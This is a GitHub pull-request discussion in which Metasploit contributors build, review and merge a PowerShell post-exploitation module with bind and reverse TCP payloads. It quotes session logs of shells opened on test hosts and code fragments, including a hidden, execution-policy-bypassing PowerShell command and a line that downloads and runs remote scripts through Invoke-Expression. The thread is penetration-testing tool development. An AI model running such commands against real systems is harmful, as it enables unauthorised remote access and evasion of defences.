New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Interactive PowerShell Post Module #5194

Merged
merged 44 commits into from Apr 27, 2015

Conversation

Projects
None yet
10 participants
@benpturner
Contributor

benpturner commented Apr 19, 2015

interactive powershell prompt from a compromised session. It opens a TCP
listener for Powershell and automatically creates the handler. You can
also pass this other powershell files in the LOAD_MODULE option to go
ahead and download using the download cradle once the session is
established.

@Meatballs1 Meatballs1 self-assigned this Apr 19, 2015

@Meatballs1

This comment has been minimized.

Show comment
Hide comment
@Meatballs1

Meatballs1 Apr 19, 2015

Contributor

I have made some changes in https://github.com/benpturner/metasploit-framework/pull/1. If you could test them out that would be great!

  • Placed the powershell script into a real file
  • Converted it into an exploit module.
  • Instead of using the windows/shell_bind_tcp payload have added a cmd/windows/interact payload which lets you pass it an already established socket (cmd/unix/interact is used for shells gained over SSH for example).
  • I have changed the way powershell is executed, this means the process will close after the connection closes. This also closes down the socket so you can re-execute the module after exiting it.
  • Used the Msf::Post::Windows::Powershell mixin to perform the compression etc.
Contributor

Meatballs1 commented Apr 19, 2015

I have made some changes in https://github.com/benpturner/metasploit-framework/pull/1. If you could test them out that would be great!

  • Placed the powershell script into a real file
  • Converted it into an exploit module.
  • Instead of using the windows/shell_bind_tcp payload have added a cmd/windows/interact payload which lets you pass it an already established socket (cmd/unix/interact is used for shells gained over SSH for example).
  • I have changed the way powershell is executed, this means the process will close after the connection closes. This also closes down the socket so you can re-execute the module after exiting it.
  • Used the Msf::Post::Windows::Powershell mixin to perform the compression etc.
@Meatballs1

This comment has been minimized.

Show comment
Hide comment
@Meatballs1

Meatballs1 Apr 19, 2015

Contributor

Example run:

msf exploit(interactive_powershell) > run

[*] Loading 1 modules into the interactive PowerShell session
[+]  https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Recon/Get-ComputerDetails.ps1
[*] Started PowerShell on BEN-TEST - PID: 3932
[*] Attempting to connect to 192.168.153.133:4444...
[*] Found shell.
[*] Command shell session 26 opened (192.168.153.143:55331 -> 192.168.153.133:4444) at 2015-04-19 23:37:43 +0100

Find-4624Logons

Name                           Value                                           
----                           -----                                           
                               @{LogSource=Security; Count=1; SourceAccountN...


PS C:\Users\admin> pwd

Path                                                                           
----                                                                           
C:\Users\admin                                                                 


PS C:\Users\admin> exit

[*] 192.168.153.133 - Command shell session 26 closed.  Reason: Died from Errno::ECONNRESET

msf exploit(interactive_powershell) >
Contributor

Meatballs1 commented Apr 19, 2015

Example run:

msf exploit(interactive_powershell) > run

[*] Loading 1 modules into the interactive PowerShell session
[+]  https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Recon/Get-ComputerDetails.ps1
[*] Started PowerShell on BEN-TEST - PID: 3932
[*] Attempting to connect to 192.168.153.133:4444...
[*] Found shell.
[*] Command shell session 26 opened (192.168.153.143:55331 -> 192.168.153.133:4444) at 2015-04-19 23:37:43 +0100

Find-4624Logons

Name                           Value                                           
----                           -----                                           
                               @{LogSource=Security; Count=1; SourceAccountN...


PS C:\Users\admin> pwd

Path                                                                           
----                                                                           
C:\Users\admin                                                                 


PS C:\Users\admin> exit

[*] 192.168.153.133 - Command shell session 26 closed.  Reason: Died from Errno::ECONNRESET

msf exploit(interactive_powershell) >
@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 19, 2015

Contributor

This should probably be a new session type, since PS isn't compatible with command shells.

Contributor

hdm commented Apr 19, 2015

This should probably be a new session type, since PS isn't compatible with command shells.

@sempervictus

This comment has been minimized.

Show comment
Hide comment
@sempervictus

sempervictus Apr 20, 2015

Contributor

Well played sir (or ma'am).
@Meatballs1 or @benpturner could you clean out the encoding and other scaffold components, and pull the actual PSH into a template so we can sub/mod it on the fly? We have library routines to deal with the deflation and such (i actually just saw code land in master missing the EOFs again which might cause problems for injected code like this), and it allows for the creation of more dynamic results since we can mix and match encoding and compression algos to screw with defenses.

I'm with @hmoore-r7 on the session type, when i was playing with the PSH shells from SET the reuse of standard shell sessions gave me some trouble so i had to create a new session type. might even have the code somewhere if needed.

Thanks to all who are working on this.

Contributor

sempervictus commented Apr 20, 2015

Well played sir (or ma'am).
@Meatballs1 or @benpturner could you clean out the encoding and other scaffold components, and pull the actual PSH into a template so we can sub/mod it on the fly? We have library routines to deal with the deflation and such (i actually just saw code land in master missing the EOFs again which might cause problems for injected code like this), and it allows for the creation of more dynamic results since we can mix and match encoding and compression algos to screw with defenses.

I'm with @hmoore-r7 on the session type, when i was playing with the PSH shells from SET the reuse of standard shell sessions gave me some trouble so i had to create a new session type. might even have the code somewhere if needed.

Thanks to all who are working on this.

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 20, 2015

Contributor

@Meatballs1, I have tested your changes and 100% happy with them. Works better as an exploit module and not exits smoothly and can be restarted again. Do I have to do anything else to submit this for master?

Contributor

benpturner commented Apr 20, 2015

@Meatballs1, I have tested your changes and 100% happy with them. Works better as an exploit module and not exits smoothly and can be restarted again. Do I have to do anything else to submit this for master?

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 20, 2015

Contributor

@benpturner re: master, this kind of breaks the metasploit model, and we should look at a refactor that makes PowerShell a first-class session type (and add the related payloads, etc). Happy to help with this effort, but I don't believe we could accept this change today due to the conflict with the model (it creates a shell session that is incompatible with post modules).

cc @jlee-r7 @trosen-r7

Contributor

hdm commented Apr 20, 2015

@benpturner re: master, this kind of breaks the metasploit model, and we should look at a refactor that makes PowerShell a first-class session type (and add the related payloads, etc). Happy to help with this effort, but I don't believe we could accept this change today due to the conflict with the model (it creates a shell session that is incompatible with post modules).

cc @jlee-r7 @trosen-r7

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 20, 2015

Contributor

Also of note is that this fails the msftidy check:

[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/msftidy.rb ---
modules/exploits/windows/local/interactive_powershell.rb:91 - [ERROR] fail_with requires a valid Failure:: reason as first parameter: fail_with(Exploit::Failure::Unknown, 'Failed to start powershell process') unless res && res.pid 
modules/exploits/windows/local/interactive_powershell.rb:128 - [ERROR] fail_with requires a valid Failure:: reason as first parameter: fail_with(Exploit::Failure::Unknown, "Unable to connect") 
modules/payloads/singles/cmd/windows/interact.rb - msftidy check passed
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------
The command "./.git/hooks/post-merge" failed and exited with 16 during .
Contributor

hdm commented Apr 20, 2015

Also of note is that this fails the msftidy check:

[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/msftidy.rb ---
modules/exploits/windows/local/interactive_powershell.rb:91 - [ERROR] fail_with requires a valid Failure:: reason as first parameter: fail_with(Exploit::Failure::Unknown, 'Failed to start powershell process') unless res && res.pid 
modules/exploits/windows/local/interactive_powershell.rb:128 - [ERROR] fail_with requires a valid Failure:: reason as first parameter: fail_with(Exploit::Failure::Unknown, "Unable to connect") 
modules/payloads/singles/cmd/windows/interact.rb - msftidy check passed
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------
The command "./.git/hooks/post-merge" failed and exited with 16 during .
@Meatballs1

This comment has been minimized.

Show comment
Hide comment
@Meatballs1

Meatballs1 Apr 20, 2015

Contributor

Gah I'm sure I have it hooked, but I think @FireFart added that recently :)

I think I am supplying a longer namespace declaration for Exploit::Failure::x rather than Failure::x which the regex rejects.

Contributor

Meatballs1 commented Apr 20, 2015

Gah I'm sure I have it hooked, but I think @FireFart added that recently :)

I think I am supplying a longer namespace declaration for Exploit::Failure::x rather than Failure::x which the regex rejects.

@Meatballs1

This comment has been minimized.

Show comment
Hide comment
@Meatballs1

Meatballs1 Apr 20, 2015

Contributor

@sempervictus Do your comments apply to the new structure? PS if you can point out the EOF bits that are missing can work to get them tidied up. Also need to work on refactoring the Post::Windows::Powershell module to use the Rex::Powershell libraries now

Contributor

Meatballs1 commented Apr 20, 2015

@sempervictus Do your comments apply to the new structure? PS if you can point out the EOF bits that are missing can work to get them tidied up. Also need to work on refactoring the Post::Windows::Powershell module to use the Rex::Powershell libraries now

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Apr 20, 2015

Contributor

Yeah I only added Failure::x to msftidy. According to https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit.rb#L1224 the reason has to be an Msf::Module::Failure: Does an Exploit::Failure even exist?

Contributor

FireFart commented Apr 20, 2015

Yeah I only added Failure::x to msftidy. According to https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit.rb#L1224 the reason has to be an Msf::Module::Failure: Does an Exploit::Failure even exist?

@Meatballs1

This comment has been minimized.

Show comment
Hide comment
@Meatballs1

Meatballs1 Apr 20, 2015

Contributor

I think they got moved from Exploit to Module at some point. Will fix up with next iterations/better powershell structure.

Contributor

Meatballs1 commented Apr 20, 2015

I think they got moved from Exploit to Module at some point. Will fix up with next iterations/better powershell structure.

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 20, 2015

Contributor

@hmoore-r7 Very happy for you to help with this.

Contributor

benpturner commented Apr 20, 2015

@hmoore-r7 Very happy for you to help with this.

@void-in

This comment has been minimized.

Show comment
Hide comment
@void-in

void-in Apr 20, 2015

Contributor

@benpturner The rpec issue is easy to resolve as @Meatballs1 mentioned as well. All you need to do is replace Exploit::Failure::Unknown with Failure::Unknown in the fail_with statements. Everything should be fine then.

Contributor

void-in commented Apr 20, 2015

@benpturner The rpec issue is easy to resolve as @Meatballs1 mentioned as well. All you need to do is replace Exploit::Failure::Unknown with Failure::Unknown in the fail_with statements. Everything should be fine then.

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 20, 2015

Contributor

Updated that issue

Contributor

benpturner commented Apr 20, 2015

Updated that issue

@davehardy20

This comment has been minimized.

Show comment
Hide comment
@davehardy20

davehardy20 Apr 20, 2015

Contributor

I just made that change too Ben and tested the module and it works fine

Contributor

davehardy20 commented Apr 20, 2015

I just made that change too Ben and tested the module and it works fine

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 20, 2015

Contributor

@davehardy20 cheers

Contributor

benpturner commented Apr 20, 2015

@davehardy20 cheers

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 20, 2015

Contributor

The build is failing with

Untested payload detected.  Running `tools/missing_payload_tests.rb` to see contexts to add to `spec/modules/payloads_spec.rb` to test those payload ancestor reference names.
Add the following context to `spec/modules/payloads_spec.rb` by inserting them in lexical order between the pre-existing contexts:
  context 'cmd/windows/interact' do
    it_should_behave_like 'payload cached size is consistent',
                          ancestor_reference_names: [
                            'singles/cmd/windows/interact'
                          ],
                          dynamic_size: false,
                          modules_pathname: modules_pathname,
                          reference_name: 'cmd/windows/interact'
  end

Its probably worth ignoring this until we refactor this as a new session type, though.

Contributor

hdm commented Apr 20, 2015

The build is failing with

Untested payload detected.  Running `tools/missing_payload_tests.rb` to see contexts to add to `spec/modules/payloads_spec.rb` to test those payload ancestor reference names.
Add the following context to `spec/modules/payloads_spec.rb` by inserting them in lexical order between the pre-existing contexts:
  context 'cmd/windows/interact' do
    it_should_behave_like 'payload cached size is consistent',
                          ancestor_reference_names: [
                            'singles/cmd/windows/interact'
                          ],
                          dynamic_size: false,
                          modules_pathname: modules_pathname,
                          reference_name: 'cmd/windows/interact'
  end

Its probably worth ignoring this until we refactor this as a new session type, though.

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 20, 2015

Contributor

@benpturner Should I PR to your PR, or create a fresh PR to replace this?

Contributor

hdm commented Apr 20, 2015

@benpturner Should I PR to your PR, or create a fresh PR to replace this?

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 20, 2015

Contributor

Upto you, whichever you think. It would be good to get this in, then work on creating a new session with their own payloads just for powershell. Happy to help with all this too

Contributor

benpturner commented Apr 20, 2015

Upto you, whichever you think. It would be good to get this in, then work on creating a new session with their own payloads just for powershell. Happy to help with all this too

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 20, 2015

Contributor

Should be able to create a reverse_tcp payload option as well

Contributor

benpturner commented Apr 20, 2015

Should be able to create a reverse_tcp payload option as well

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 21, 2015

Contributor

@hmoore-r7 what should we do here

Contributor

benpturner commented Apr 21, 2015

@hmoore-r7 what should we do here

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 21, 2015

Contributor

Are you comfortable implementing a new session type and building out the individual payloads?

Contributor

hdm commented Apr 21, 2015

Are you comfortable implementing a new session type and building out the individual payloads?

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 21, 2015

Contributor

@hmoore-r7 I wouldn't say comfortable, but I'm happy to have a go and learn. Do you mean creating a new session, e.g. /lib/msf/base/sessions/* If there is any way you can help or point me in the right direction then i'm happy to help. I have created some reverse_tcp, bind_tcp powershell options and even UDP options just not sure how to go about the session type.

Contributor

benpturner commented Apr 21, 2015

@hmoore-r7 I wouldn't say comfortable, but I'm happy to have a go and learn. Do you mean creating a new session, e.g. /lib/msf/base/sessions/* If there is any way you can help or point me in the right direction then i'm happy to help. I have created some reverse_tcp, bind_tcp powershell options and even UDP options just not sure how to go about the session type.

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 21, 2015

Contributor

Got it - I can PR to your branch for the arch & session type support, should make more sense from there. If you want to start on payloads, it may take me a day or two to get to this.

Contributor

hdm commented Apr 21, 2015

Got it - I can PR to your branch for the arch & session type support, should make more sense from there. If you want to start on payloads, it may take me a day or two to get to this.

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 21, 2015

Contributor

Ok sounds like a plan

Contributor

benpturner commented Apr 21, 2015

Ok sounds like a plan

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 22, 2015

Contributor

@hmoore-r7 I was testing a payload module (windows/powershell_bind_tcp) I created for this and found that while this is going to be a cool addition, it got caught by AV when using it with PSEXEC. I think it will still be a good idea to have the interactive_powershell local exploit, to obtain a powershell that way. What do you think? Also could you maybe explain your thoughts around the new session, will it allow post modules to be run against it etc? Like a post/powershell/invoke-dump-users for example?

Contributor

benpturner commented Apr 22, 2015

@hmoore-r7 I was testing a payload module (windows/powershell_bind_tcp) I created for this and found that while this is going to be a cool addition, it got caught by AV when using it with PSEXEC. I think it will still be a good idea to have the interactive_powershell local exploit, to obtain a powershell that way. What do you think? Also could you maybe explain your thoughts around the new session, will it allow post modules to be run against it etc? Like a post/powershell/invoke-dump-users for example?

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 22, 2015

Contributor

No problem with adding an interactive version as well, it just breaks things today unless we create a new session type for it.

Contributor

hdm commented Apr 22, 2015

No problem with adding an interactive version as well, it just breaks things today unless we create a new session type for it.

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 22, 2015

Contributor

By interactive, do you mean just making a bind_tcp and running it locally? Curious how AV caught powershell (assuming it was delivered via command-line and not an EXE wrapper of any sort).

Contributor

hdm commented Apr 22, 2015

By interactive, do you mean just making a bind_tcp and running it locally? Curious how AV caught powershell (assuming it was delivered via command-line and not an EXE wrapper of any sort).

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 22, 2015

Contributor

When I say interactive, this is just what the module was changed to, basically it was a post module that takes a powershell script and creates a bind_powershell session using the shell.exec API in windows. I think it was the psexec part of the script that got caught not necessarily the powershell script, it was just a way to execute it. I created a payload module that could be added to psexec module.

Contributor

benpturner commented Apr 22, 2015

When I say interactive, this is just what the module was changed to, basically it was a post module that takes a powershell script and creates a bind_powershell session using the shell.exec API in windows. I think it was the psexec part of the script that got caught not necessarily the powershell script, it was just a way to execute it. I created a payload module that could be added to psexec module.

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 22, 2015

Contributor

@hmoore-r7 I've uploaded some of the payload modules i've been working on, here is a bind_tcp and reverse_tcp powershell payload. This can be used with msfvenom and a valid exploit, e.g. psexec or similar.

Contributor

benpturner commented Apr 22, 2015

@hmoore-r7 I've uploaded some of the payload modules i've been working on, here is a bind_tcp and reverse_tcp powershell payload. This can be used with msfvenom and a valid exploit, e.g. psexec or similar.

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 26, 2015

Contributor

Just re-added the ARCH_X86 payloads and the payload_inject module works well with them now. Is it worth keeping the ARCH_CMD payloads anyway as you can still get the raw payload as I think these could come in handy. Should I now remove my module interactive_powershell?

Contributor

benpturner commented Apr 26, 2015

Just re-added the ARCH_X86 payloads and the payload_inject module works well with them now. Is it worth keeping the ARCH_CMD payloads anyway as you can still get the raw payload as I think these could come in handy. Should I now remove my module interactive_powershell?

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 26, 2015

Contributor

No need for interactive_powershell anymore, thanks!

Contributor

hdm commented Apr 26, 2015

No need for interactive_powershell anymore, thanks!

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 26, 2015

Contributor

Just pushed all the above updates bar the session info. If the class is " Msf::Sessions::PowerShell < Msf::Sessions::CommandShell" how can I overwrite the "self.info = initial_output".

What function do I add to the powershell.rb session type?

Contributor

benpturner commented Apr 26, 2015

Just pushed all the above updates bar the session info. If the class is " Msf::Sessions::PowerShell < Msf::Sessions::CommandShell" how can I overwrite the "self.info = initial_output".

What function do I add to the powershell.rb session type?

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 26, 2015

Contributor

In your powershell base class, add the following method:

  #
  # Execute any specified auto-run scripts for this session
  #
  def process_autoruns(datastore)
    # Read the initial output (PS banner) and toss it)
    initial_output = shell_read(-1, 0.01)
    # TODO: send command for getting the username
    # TODO: parse out the username and set it to a variable
    # TODO: send command for getting the hostname
    # TODO: parse out the hostname and set it to a variable
    # Set the session info
    self.info = "#{username} @ #{hostname}"
    # Call our parent class's autoruns processing method
    super
end
Contributor

hdm commented Apr 26, 2015

In your powershell base class, add the following method:

  #
  # Execute any specified auto-run scripts for this session
  #
  def process_autoruns(datastore)
    # Read the initial output (PS banner) and toss it)
    initial_output = shell_read(-1, 0.01)
    # TODO: send command for getting the username
    # TODO: parse out the username and set it to a variable
    # TODO: send command for getting the hostname
    # TODO: parse out the hostname and set it to a variable
    # Set the session info
    self.info = "#{username} @ #{hostname}"
    # Call our parent class's autoruns processing method
    super
end
@hdm

View changes

Show outdated Hide outdated data/exploits/powershell/powerfun.ps1
(Get-Webclient).DownloadString($module)|Invoke-Expression
}
}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")

This comment has been minimized.

@hdm

hdm Apr 26, 2015

Contributor

It may be worth adding code to get the username and hostname here for easy access in the session intializer (process_autoruns). For example:

$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user @username on @hostname`n")
@hdm

hdm Apr 26, 2015

Contributor

It may be worth adding code to get the username and hostname here for easy access in the session intializer (process_autoruns). For example:

$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user @username on @hostname`n")

This comment has been minimized.

@benpturner

benpturner Apr 26, 2015

Contributor

Yeah good idea, was just thinking the exact same thing......

@benpturner

benpturner Apr 26, 2015

Contributor

Yeah good idea, was just thinking the exact same thing......

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 26, 2015

Contributor

@hmoore-r7 Tried this and it seems to hang and not drop into the powershell session?

Contributor

benpturner commented Apr 26, 2015

@hmoore-r7 Tried this and it seems to hang and not drop into the powershell session?

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 26, 2015

Contributor

@hmoore-r7 I've now added the username and host to the first line of the session. Do you know the regex for only getting the first line before a new line character. This would then only show the username.

Contributor

benpturner commented Apr 26, 2015

@hmoore-r7 I've now added the username and host to the first line of the session. Do you know the regex for only getting the first line before a new line character. This would then only show the username.

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 26, 2015

Contributor

Are there any other errors before you are able to merge this?

Contributor

benpturner commented Apr 26, 2015

Are there any other errors before you are able to merge this?

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 26, 2015

Contributor

The hostname/username in the session info and the sessions -u issue seem to be the only blockers. Once the functional stuff is sorted out I can do a cosmetic pass.

Contributor

hdm commented Apr 26, 2015

The hostname/username in the session info and the sessions -u issue seem to be the only blockers. Once the functional stuff is sorted out I can do a cosmetic pass.

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 26, 2015

Contributor

I've added the hostname/username to the start of the powershell command so this is processed into the session information. In terms of the functional stuff, is there anything you want me to do?

Contributor

benpturner commented Apr 26, 2015

I've added the hostname/username to the start of the powershell command so this is processed into the session information. In terms of the functional stuff, is there anything you want me to do?

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 26, 2015

Contributor

We should address the sessions -u problem (it runs shell_to_meterpreter, but this module doesn't work with the powershell session). Can you push your changes to review?

Contributor

hdm commented Apr 26, 2015

We should address the sessions -u problem (it runs shell_to_meterpreter, but this module doesn't work with the powershell session). Can you push your changes to review?

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 26, 2015

Contributor

I think I removed the option for powershell in the sessions -u. I have pushed all my latest changes, have you not got them?

Contributor

benpturner commented Apr 26, 2015

I think I removed the option for powershell in the sessions -u. I have pushed all my latest changes, have you not got them?

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 26, 2015

Contributor

Looks like these didn't get pushed to your branch (not showing here)

Contributor

hdm commented Apr 26, 2015

Looks like these didn't get pushed to your branch (not showing here)

@hdm

View changes

Show outdated Hide outdated lib/msf/ui/console/command_dispatcher/core.rb
@@ -1775,6 +1775,9 @@ def cmd_sessions(*args)
elsif session.type == 'shell'
output = session.shell_command(cmd)
print_line(output) if output
elsif session.type == 'powershell'

This comment has been minimized.

@hdm

hdm Apr 26, 2015

Contributor

Still listed

@hdm

hdm Apr 26, 2015

Contributor

Still listed

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 26, 2015

Contributor

Ahhh, yeah you're right sorry. I've removed this now. Changes should all be in the request now

Contributor

benpturner commented Apr 26, 2015

Ahhh, yeah you're right sorry. I've removed this now. Changes should all be in the request now

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 26, 2015

Contributor

Some leftover issues:

+      'PayloadType'   => 'cmd_interact',

These should be removed from the CMD payloads. I'll do a final cosmetic pass on the rest before merging.

Contributor

hdm commented Apr 26, 2015

Some leftover issues:

+      'PayloadType'   => 'cmd_interact',

These should be removed from the CMD payloads. I'll do a final cosmetic pass on the rest before merging.

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 26, 2015

Contributor

Should it be just cmd now

Contributor

benpturner commented Apr 26, 2015

Should it be just cmd now

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 26, 2015

Contributor

The #TODO: items weren't optional either. You could replace these with something like:

if output_line =~ /running as user ([^\s]+) on ([^\s]+)/
  username = $1
  hostname = $2
end
Contributor

hdm commented Apr 26, 2015

The #TODO: items weren't optional either. You could replace these with something like:

if output_line =~ /running as user ([^\s]+) on ([^\s]+)/
  username = $1
  hostname = $2
end
@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 26, 2015

Contributor

@benpturner You can just omit the PayloadType lines entirely from the CMD payloads

Contributor

hdm commented Apr 26, 2015

@benpturner You can just omit the PayloadType lines entirely from the CMD payloads

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 26, 2015

Contributor

@hmoore-r7 Those changes are both applied now, I just want to say thanks alot for all your help on this....

Contributor

benpturner commented Apr 26, 2015

@hmoore-r7 Those changes are both applied now, I just want to say thanks alot for all your help on this....

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 26, 2015

Contributor

@benpturner Thank you for contributing to Metasploit, sorry this PR took the long road =)

@Meatballs1 Thanks getting the review rolling!

I'll finish the review here, tweak any minor & cosmetic things, and merge in a bit after testing.

Contributor

hdm commented Apr 26, 2015

@benpturner Thank you for contributing to Metasploit, sorry this PR took the long road =)

@Meatballs1 Thanks getting the review rolling!

I'll finish the review here, tweak any minor & cosmetic things, and merge in a bit after testing.

@benpturner

This comment has been minimized.

Show comment
Hide comment
@benpturner

benpturner Apr 26, 2015

Contributor

Sweet, cheers @hmoore-r7 and @Meatballs1........

Contributor

benpturner commented Apr 26, 2015

Sweet, cheers @hmoore-r7 and @Meatballs1........

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 26, 2015

Contributor

Looks good:

msf exploit(handler) > [*] Starting the payload handler...
[*] Powershell session session 1 opened (192.168.0.3:60013 -> 192.168.254.103:4444) at 2015-04-26 16:00:27 -0500

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type         Information           Connection
  --  ----         -----------           ----------
  1   powershell   Developer @ BEHEMOTH  192.168.0.3:60013 -> 192.168.254.103:4444 (192.168.254.103)

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[-] Session 1 is not a command shell session, skipping...
Contributor

hdm commented Apr 26, 2015

Looks good:

msf exploit(handler) > [*] Starting the payload handler...
[*] Powershell session session 1 opened (192.168.0.3:60013 -> 192.168.254.103:4444) at 2015-04-26 16:00:27 -0500

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type         Information           Connection
  --  ----         -----------           ----------
  1   powershell   Developer @ BEHEMOTH  192.168.0.3:60013 -> 192.168.254.103:4444 (192.168.254.103)

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[-] Session 1 is not a command shell session, skipping...

hdm pushed a commit to hdm/metasploit-framework that referenced this pull request Apr 26, 2015

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 26, 2015

Contributor

Future work would include moving to SSL for connections, supporting native Meterpreter injection via PowerShell scripts, and moving the payload logic into a shared mixin to avoid duplicate code.

Contributor

hdm commented Apr 26, 2015

Future work would include moving to SSL for connections, supporting native Meterpreter injection via PowerShell scripts, and moving the payload logic into a shared mixin to avoid duplicate code.

@Meatballs1

This comment has been minimized.

Show comment
Hide comment
@Meatballs1

Meatballs1 Apr 27, 2015

Contributor

phew, good work guys

Contributor

Meatballs1 commented Apr 27, 2015

phew, good work guys

@Meatballs1

This comment has been minimized.

Show comment
Hide comment
@Meatballs1

Meatballs1 Apr 27, 2015

Contributor

p.s. @hmoore-r7 you do realise you 'landed' it to your own fork and not rapid7 right? Assume you are still tweaking...

Contributor

Meatballs1 commented Apr 27, 2015

p.s. @hmoore-r7 you do realise you 'landed' it to your own fork and not rapid7 right? Assume you are still tweaking...

script_in.gsub!('LHOST_REPLACE', lhost.to_s)
script = Rex::Powershell::Command.compress_script(script_in)
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"

This comment has been minimized.

@Meatballs1

Meatballs1 Apr 27, 2015

Contributor

n.b. the Rex::Powershell modules also have the command line generated written up in generate_psh_command_line. This allows hash options to be used to generate the arguments etc.

@Meatballs1

Meatballs1 Apr 27, 2015

Contributor

n.b. the Rex::Powershell modules also have the command line generated written up in generate_psh_command_line. This allows hash options to be used to generate the arguments etc.

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Apr 27, 2015

Contributor

@Meatballs1 Thanks for catching that!

Contributor

hdm commented Apr 27, 2015

@Meatballs1 Thanks for catching that!

@hdm hdm merged commit 82fe480 into rapid7:master Apr 27, 2015

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

@benpturner benpturner deleted the benpturner:powershell branch Apr 27, 2015

],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,

This comment has been minimized.

@Meatballs1

Meatballs1 Apr 27, 2015

Contributor

Is this correct btw?

@Meatballs1

Meatballs1 Apr 27, 2015

Contributor

Is this correct btw?

],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,

This comment has been minimized.

@Meatballs1

Meatballs1 Apr 27, 2015

Contributor

Not ARCH_CMD?

@Meatballs1

Meatballs1 Apr 27, 2015

Contributor

Not ARCH_CMD?

This comment has been minimized.

@hdm

hdm Apr 27, 2015

Contributor

Correct, two sets of payloads, one which are ARCH_CMD, another which use the windows/exec payload as a base and are ARCH_X86 (allows for EXE generation, silly, but helps with some use cases).

@hdm

hdm Apr 27, 2015

Contributor

Correct, two sets of payloads, one which are ARCH_CMD, another which use the windows/exec payload as a base and are ARCH_X86 (allows for EXE generation, silly, but helps with some use cases).

@watson40

This comment has been minimized.

Show comment
Hide comment
@watson40

watson40 Aug 13, 2018

Can I get the software please

Can I get the software please

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment